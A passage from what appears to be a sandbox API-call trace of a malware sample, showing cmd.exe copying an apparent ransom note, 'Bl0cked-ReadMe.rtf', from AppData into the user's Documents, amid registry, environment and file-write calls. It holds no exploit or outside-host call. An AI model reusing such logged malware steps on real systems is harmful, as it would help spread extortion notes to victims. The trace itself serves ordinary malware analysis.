lpcbData=0x2ee6c8*=0x1000 | out: lpType=0x2ee6cc*=0x0, lpData=0x2ee6d0*=0x40, lpcbData=0x2ee6c8*=0x1000) returned 0x2 [0236.101] RegCloseKey (hKey=0x40) returned 0x0 [0236.101] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2ee6c4 | out: phkResult=0x2ee6c4*=0x40) returned 0x0 [0236.101] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2ee6cc, lpData=0x2ee6d0, lpcbData=0x2ee6c8*=0x1000 | out: lpType=0x2ee6cc*=0x0, lpData=0x2ee6d0*=0x40, lpcbData=0x2ee6c8*=0x1000) returned 0x2 [0236.101] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2ee6cc, lpData=0x2ee6d0, lpcbData=0x2ee6c8*=0x1000 | out: lpType=0x2ee6cc*=0x4, lpData=0x2ee6d0*=0x1, lpcbData=0x2ee6c8*=0x4) returned 0x0 [0236.101] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2ee6cc, lpData=0x2ee6d0, lpcbData=0x2ee6c8*=0x1000 | out: lpType=0x2ee6cc*=0x0, lpData=0x2ee6d0*=0x1, lpcbData=0x2ee6c8*=0x1000) returned 0x2 [0236.101] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2ee6cc, lpData=0x2ee6d0, lpcbData=0x2ee6c8*=0x1000 | out: lpType=0x2ee6cc*=0x4, lpData=0x2ee6d0*=0x0, lpcbData=0x2ee6c8*=0x4) returned 0x0 [0236.101] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2ee6cc, lpData=0x2ee6d0, lpcbData=0x2ee6c8*=0x1000 | out: lpType=0x2ee6cc*=0x4, lpData=0x2ee6d0*=0x9, lpcbData=0x2ee6c8*=0x4) returned 0x0 [0236.101] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2ee6cc, lpData=0x2ee6d0, lpcbData=0x2ee6c8*=0x1000 | out: lpType=0x2ee6cc*=0x4, lpData=0x2ee6d0*=0x9, lpcbData=0x2ee6c8*=0x4) returned 0x0 [0236.101] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2ee6cc, lpData=0x2ee6d0, lpcbData=0x2ee6c8*=0x1000 | out: lpType=0x2ee6cc*=0x0, 
lpData=0x2ee6d0*=0x9, lpcbData=0x2ee6c8*=0x1000) returned 0x2 [0236.101] RegCloseKey (hKey=0x40) returned 0x0 [0236.101] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863c3 [0236.101] srand (_Seed=0x5b8863c3) [0236.101] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\MYSHAP~1\\Bl0cked-ReadMe.rtf\"" [0236.101] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\MYSHAP~1\\Bl0cked-ReadMe.rtf\"" [0236.102] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49fd5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0236.102] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x4518e8, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0236.102] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49fe0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0236.102] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49fe0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0236.102] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49fe0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0236.102] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0236.102] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0236.102] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0236.102] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0236.102] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0236.102] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0236.102] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 
[0236.102] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0236.102] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0236.102] GetEnvironmentStringsW () returned 0x4522d8* [0236.102] FreeEnvironmentStringsW (penv=0x4522d8) returned 1 [0236.102] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x49fe0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0236.102] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x49fe0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0236.102] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0236.102] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0236.102] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0236.102] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0236.103] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0236.103] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0236.103] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0236.103] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0236.103] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2ef490 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0236.103] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x2ef490, lpFilePart=0x2ef48c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x2ef48c*="Desktop") returned 0x18 [0236.103] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0236.103] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x2ef20c | out: lpFindFileData=0x2ef20c) returned 0x450018 [0236.103] FindClose (in: hFindFile=0x450018 | out: hFindFile=0x450018) returned 1 [0236.103] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x2ef20c | out: lpFindFileData=0x2ef20c) returned 0x450018 [0236.103] FindClose 
(in: hFindFile=0x450018 | out: hFindFile=0x450018) returned 1 [0236.103] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x2ef20c | out: lpFindFileData=0x2ef20c) returned 0x450018 [0236.103] FindClose (in: hFindFile=0x450018 | out: hFindFile=0x450018) returned 1 [0236.103] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0236.103] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0236.103] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0236.104] GetEnvironmentStringsW () returned 0x452af8* [0236.104] FreeEnvironmentStringsW (penv=0x452af8) returned 1 [0236.104] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49fd5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0236.104] GetConsoleOutputCP () returned 0x1b5 [0236.106] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49fd4260 | out: lpCPInfo=0x49fd4260) returned 1 [0236.106] GetUserDefaultLCID () returned 0x409 [0236.106] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x49fd4950, cchData=8 | out: lpLCData=":") returned 2 [0236.106] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x2ef5d0, cchData=128 | out: lpLCData="0") returned 2 [0236.106] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x2ef5d0, cchData=128 | out: lpLCData="0") returned 2 [0236.106] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x2ef5d0, cchData=128 | out: lpLCData="1") returned 2 [0236.106] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x49fd4940, cchData=8 | out: lpLCData="/") returned 2 [0236.106] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x49fd4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0236.107] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x49fd4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0236.107] GetLocaleInfoW (in: 
Locale=0x409, LCType=0x33, lpLCData=0x49fd4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0236.107] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x49fd4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0236.107] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x49fd4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0236.107] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x49fd4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0236.107] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x49fd4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0236.107] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x49fd4930, cchData=8 | out: lpLCData=".") returned 2 [0236.107] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x49fd4920, cchData=8 | out: lpLCData=",") returned 2 [0236.107] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0236.107] GetConsoleTitleW (in: lpConsoleTitle=0x4408e8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0236.117] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0236.117] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0236.117] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0236.117] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0236.118] _wcsicmp (_String1="type", _String2=")") returned 75 [0236.118] _wcsicmp (_String1="FOR", _String2="type") returned -14 [0236.118] _wcsicmp (_String1="FOR/?", _String2="type") returned -14 [0236.118] _wcsicmp (_String1="IF", _String2="type") returned -11 [0236.118] _wcsicmp (_String1="IF/?", _String2="type") returned -11 [0236.118] _wcsicmp (_String1="REM", _String2="type") returned -2 [0236.118] _wcsicmp (_String1="REM/?", _String2="type") returned -2 [0236.123] _get_osfhandle (_FileHandle=1) returned 0x7 [0236.123] _get_osfhandle (_FileHandle=1) 
returned 0x7 [0236.123] _get_osfhandle (_FileHandle=1) returned 0x7 [0236.123] GetFileType (hFile=0x7) returned 0x2 [0236.124] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0236.124] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2ef4c8 | out: lpMode=0x2ef4c8) returned 1 [0236.124] _dup (_FileHandle=1) returned 3 [0236.124] _close (_FileHandle=1) returned 0 [0236.124] _wcsicmp (_String1="C:\\Users\\EEBsYm5\\DOCUME~1\\MYSHAP~1\\Bl0cked-ReadMe.rtf", _String2="con") returned -53 [0236.125] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\MYSHAP~1\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\docume~1\\myshap~1\\bl0cked-readme.rtf"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x2ef498, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4c [0236.126] _open_osfhandle (_OSFileHandle=0x4c, _Flags=8) returned 1 [0236.126] GetConsoleTitleW (in: lpConsoleTitle=0x2ef2c8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0236.126] _wcsicmp (_String1="type", _String2="DIR") returned 16 [0236.126] _wcsicmp (_String1="type", _String2="ERASE") returned 15 [0236.126] _wcsicmp (_String1="type", _String2="DEL") returned 16 [0236.126] _wcsicmp (_String1="type", _String2="TYPE") returned 0 [0236.127] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49fd5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0236.127] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF", fInfoLevelId=0x1, lpFindFileData=0x2eee2c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2eee2c) returned 0x440e78 [0236.127] _wcsicmp (_String1="BL0CKE~1.RTF", _String2=".") returned 52 [0236.127] _wcsicmp (_String1="BL0CKE~1.RTF", _String2="..") returned 52 [0236.127] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cke~1.rtf")) 
returned 0x2020 [0236.127] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cked-readme.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x2edd38, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54 [0236.127] _open_osfhandle (_OSFileHandle=0x54, _Flags=8) returned 4 [0236.127] _get_osfhandle (_FileHandle=4) returned 0x54 [0236.127] GetFileType (hFile=0x54) returned 0x1 [0236.127] _get_osfhandle (_FileHandle=4) returned 0x54 [0236.127] GetFileSize (in: hFile=0x54, lpFileSizeHigh=0x2edd90 | out: lpFileSizeHigh=0x2edd90*=0x0) returned 0x1632 [0236.127] _get_osfhandle (_FileHandle=4) returned 0x54 [0236.127] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0236.127] _get_osfhandle (_FileHandle=4) returned 0x54 [0236.128] ReadFile (in: hFile=0x54, lpBuffer=0x2eebc8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2eddb8, lpOverlapped=0x0 | out: lpBuffer=0x2eebc8*, lpNumberOfBytesRead=0x2eddb8*=0x200, lpOverlapped=0x0) returned 1 [0236.128] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.128] GetFileType (hFile=0x4c) returned 0x1 [0236.128] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.128] GetFileType (hFile=0x4c) returned 0x1 [0236.128] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.128] WriteFile (in: hFile=0x4c, lpBuffer=0x2eebc8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2eddac, lpOverlapped=0x0 | out: lpBuffer=0x2eebc8*, lpNumberOfBytesWritten=0x2eddac*=0x50, lpOverlapped=0x0) returned 1 [0236.129] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.129] GetFileType (hFile=0x4c) returned 0x1 [0236.129] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.129] WriteFile (in: hFile=0x4c, lpBuffer=0x2eec18*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2eddac, lpOverlapped=0x0 | out: 
lpBuffer=0x2eec18*, lpNumberOfBytesWritten=0x2eddac*=0x50, lpOverlapped=0x0) returned 1 [0236.129] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.129] GetFileType (hFile=0x4c) returned 0x1 [0236.129] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.129] WriteFile (in: hFile=0x4c, lpBuffer=0x2eec68*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2eddac, lpOverlapped=0x0 | out: lpBuffer=0x2eec68*, lpNumberOfBytesWritten=0x2eddac*=0x50, lpOverlapped=0x0) returned 1 [0236.129] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.129] GetFileType (hFile=0x4c) returned 0x1 [0236.129] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.129] WriteFile (in: hFile=0x4c, lpBuffer=0x2eecb8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2eddac, lpOverlapped=0x0 | out: lpBuffer=0x2eecb8*, lpNumberOfBytesWritten=0x2eddac*=0x50, lpOverlapped=0x0) returned 1 [0236.129] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.129] GetFileType (hFile=0x4c) returned 0x1 [0236.129] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.129] WriteFile (in: hFile=0x4c, lpBuffer=0x2eed08*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2eddac, lpOverlapped=0x0 | out: lpBuffer=0x2eed08*, lpNumberOfBytesWritten=0x2eddac*=0x50, lpOverlapped=0x0) returned 1 [0236.129] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.129] GetFileType (hFile=0x4c) returned 0x1 [0236.129] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.129] WriteFile (in: hFile=0x4c, lpBuffer=0x2eed58*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2eddac, lpOverlapped=0x0 | out: lpBuffer=0x2eed58*, lpNumberOfBytesWritten=0x2eddac*=0x50, lpOverlapped=0x0) returned 1 [0236.129] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.129] GetFileType (hFile=0x4c) returned 0x1 [0236.129] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.129] WriteFile (in: hFile=0x4c, lpBuffer=0x2eeda8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2eddac, lpOverlapped=0x0 | out: lpBuffer=0x2eeda8*, 
lpNumberOfBytesWritten=0x2eddac*=0x20, lpOverlapped=0x0) returned 1 [0236.129] _get_osfhandle (_FileHandle=4) returned 0x54 [0236.130] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edd98 | out: lpNewFilePointer=0x0) returned 1 [0236.130] _get_osfhandle (_FileHandle=4) returned 0x54 [0236.130] ReadFile (in: hFile=0x54, lpBuffer=0x2eebc8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2eddb8, lpOverlapped=0x0 | out: lpBuffer=0x2eebc8*, lpNumberOfBytesRead=0x2eddb8*=0x200, lpOverlapped=0x0) returned 1 [0236.130] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.130] GetFileType (hFile=0x4c) returned 0x1 [0236.130] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.130] GetFileType (hFile=0x4c) returned 0x1 [0236.130] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.130] WriteFile (in: hFile=0x4c, lpBuffer=0x2eebc8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2eddac, lpOverlapped=0x0 | out: lpBuffer=0x2eebc8*, lpNumberOfBytesWritten=0x2eddac*=0x50, lpOverlapped=0x0) returned 1 [0236.130] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.130] GetFileType (hFile=0x4c) returned 0x1 [0236.130] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.130] WriteFile (in: hFile=0x4c, lpBuffer=0x2eec18*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2eddac, lpOverlapped=0x0 | out: lpBuffer=0x2eec18*, lpNumberOfBytesWritten=0x2eddac*=0x50, lpOverlapped=0x0) returned 1 [0236.130] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.130] GetFileType (hFile=0x4c) returned 0x1 [0236.130] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.130] WriteFile (in: hFile=0x4c, lpBuffer=0x2eec68*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2eddac, lpOverlapped=0x0 | out: lpBuffer=0x2eec68*, lpNumberOfBytesWritten=0x2eddac*=0x50, lpOverlapped=0x0) returned 1 [0236.130] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.130] GetFileType (hFile=0x4c) returned 0x1 [0236.130] _get_osfhandle (_FileHandle=1) returned 0x4c 
[0236.130] WriteFile (in: hFile=0x4c, lpBuffer=0x2eecb8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2eddac, lpOverlapped=0x0 | out: lpBuffer=0x2eecb8*, lpNumberOfBytesWritten=0x2eddac*=0x50, lpOverlapped=0x0) returned 1 [0236.130] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.130] GetFileType (hFile=0x4c) returned 0x1 [0236.130] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.130] WriteFile (in: hFile=0x4c, lpBuffer=0x2eed08*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2eddac, lpOverlapped=0x0 | out: lpBuffer=0x2eed08*, lpNumberOfBytesWritten=0x2eddac*=0x50, lpOverlapped=0x0) returned 1 [0236.130] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.130] GetFileType (hFile=0x4c) returned 0x1 [0236.130] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.130] WriteFile (in: hFile=0x4c, lpBuffer=0x2eed58*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2eddac, lpOverlapped=0x0 | out: lpBuffer=0x2eed58*, lpNumberOfBytesWritten=0x2eddac*=0x50, lpOverlapped=0x0) returned 1 [0236.130] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.130] GetFileType (hFile=0x4c) returned 0x1 [0236.130] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.130] WriteFile (in: hFile=0x4c, lpBuffer=0x2eeda8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2eddac, lpOverlapped=0x0 | out: lpBuffer=0x2eeda8*, lpNumberOfBytesWritten=0x2eddac*=0x20, lpOverlapped=0x0) returned 1 [0236.140] _get_osfhandle (_FileHandle=4) returned 0x54 [0236.140] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edd98 | out: lpNewFilePointer=0x0) returned 1 [0236.141] _get_osfhandle (_FileHandle=4) returned 0x54 [0236.141] ReadFile (in: hFile=0x54, lpBuffer=0x2eebc8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2eddb8, lpOverlapped=0x0 | out: lpBuffer=0x2eebc8*, lpNumberOfBytesRead=0x2eddb8*=0x200, lpOverlapped=0x0) returned 1 [0236.141] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.141] GetFileType (hFile=0x4c) returned 0x1 
[0236.141] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.141] GetFileType (hFile=0x4c) returned 0x1 [0236.141] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.141] WriteFile (in: hFile=0x4c, lpBuffer=0x2eebc8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2eddac, lpOverlapped=0x0 | out: lpBuffer=0x2eebc8*, lpNumberOfBytesWritten=0x2eddac*=0x50, lpOverlapped=0x0) returned 1 [0236.141] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.141] GetFileType (hFile=0x4c) returned 0x1 [0236.141] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.141] WriteFile (in: hFile=0x4c, lpBuffer=0x2eec18*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2eddac, lpOverlapped=0x0 | out: lpBuffer=0x2eec18*, lpNumberOfBytesWritten=0x2eddac*=0x50, lpOverlapped=0x0) returned 1 [0236.141] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.141] GetFileType (hFile=0x4c) returned 0x1 [0236.141] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.141] WriteFile (in: hFile=0x4c, lpBuffer=0x2eec68*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2eddac, lpOverlapped=0x0 | out: lpBuffer=0x2eec68*, lpNumberOfBytesWritten=0x2eddac*=0x50, lpOverlapped=0x0) returned 1 [0236.141] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.141] GetFileType (hFile=0x4c) returned 0x1 [0236.141] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.141] WriteFile (in: hFile=0x4c, lpBuffer=0x2eecb8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2eddac, lpOverlapped=0x0 | out: lpBuffer=0x2eecb8*, lpNumberOfBytesWritten=0x2eddac*=0x50, lpOverlapped=0x0) returned 1 [0236.141] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.141] GetFileType (hFile=0x4c) returned 0x1 [0236.141] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.141] WriteFile (in: hFile=0x4c, lpBuffer=0x2eed08*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2eddac, lpOverlapped=0x0 | out: lpBuffer=0x2eed08*, lpNumberOfBytesWritten=0x2eddac*=0x50, lpOverlapped=0x0) returned 1 [0236.141] _get_osfhandle 
(_FileHandle=1) returned 0x4c [0236.141] GetFileType (hFile=0x4c) returned 0x1 [0236.141] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.141] WriteFile (in: hFile=0x4c, lpBuffer=0x2eed58*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2eddac, lpOverlapped=0x0 | out: lpBuffer=0x2eed58*, lpNumberOfBytesWritten=0x2eddac*=0x50, lpOverlapped=0x0) returned 1 [0236.141] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.141] GetFileType (hFile=0x4c) returned 0x1 [0236.141] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.141] WriteFile (in: hFile=0x4c, lpBuffer=0x2eeda8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2eddac, lpOverlapped=0x0 | out: lpBuffer=0x2eeda8*, lpNumberOfBytesWritten=0x2eddac*=0x20, lpOverlapped=0x0) returned 1 [0236.142] _get_osfhandle (_FileHandle=4) returned 0x54 [0236.142] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edd98 | out: lpNewFilePointer=0x0) returned 1 [0236.142] _get_osfhandle (_FileHandle=4) returned 0x54 [0236.142] ReadFile (in: hFile=0x54, lpBuffer=0x2eebc8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2eddb8, lpOverlapped=0x0 | out: lpBuffer=0x2eebc8*, lpNumberOfBytesRead=0x2eddb8*=0x200, lpOverlapped=0x0) returned 1 [0236.142] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.142] GetFileType (hFile=0x4c) returned 0x1 [0236.142] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.142] GetFileType (hFile=0x4c) returned 0x1 [0236.142] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.142] WriteFile (in: hFile=0x4c, lpBuffer=0x2eebc8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2eddac, lpOverlapped=0x0 | out: lpBuffer=0x2eebc8*, lpNumberOfBytesWritten=0x2eddac*=0x50, lpOverlapped=0x0) returned 1 [0236.142] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.142] GetFileType (hFile=0x4c) returned 0x1 [0236.142] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.142] WriteFile (in: hFile=0x4c, lpBuffer=0x2eec18*, nNumberOfBytesToWrite=0x50, 
